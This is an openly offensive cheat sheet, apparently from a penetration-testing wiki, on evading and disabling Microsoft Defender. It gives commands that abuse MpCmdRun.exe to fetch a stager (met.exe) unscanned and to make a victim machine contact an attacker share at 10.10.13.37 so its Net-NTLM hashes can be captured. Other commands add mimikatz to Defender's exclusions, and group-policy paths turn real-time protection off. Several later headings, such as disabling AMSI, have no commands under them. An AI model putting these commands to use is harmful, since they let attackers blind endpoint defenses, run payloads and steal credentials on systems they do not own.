Defender
Microsoft Defender
Download stager without triggering Defender to scan it:
Cmd > "C:\Program Files\Windows Defender\MpCmdRun.exe" -DownloadFile -Url http://127.0.0.1/met.exe -Path C:\Users\user\music\met.exeCoerce the victim machine to reach the attacker (to steal Net-NTLM):
Cmd > "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File '\\10.10.13.37\share\file'Exclusions
Add path to exclusions:
PS > $mimi = "C:\Users\user\music\mimi\x64\mimikatz.exe"
PS > Add-MpPreference -ExclusionPath $mimi [-AttackSurfaceReductionOnlyExclusions $mimi]Test path for an exclusion:
PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\folder_to_check\|*"Disable Defender
gpedit.msc > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Real-time Protection > Turn off real-time protection > Enabled ✔
gpedit.msc > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Turn off Microsoft Defender Antivirus > Enabled ✔
Disable real-time protection (proactive):
Disable scanning all downloaded files and attachments, disable AMSI (reactive):
Remove signatures (if Internet connection is present, they will be downloaded again):
Clear threats history manually:
Lower Token Integrity
Windows Security Center API (WSC)
defendnot
Last updated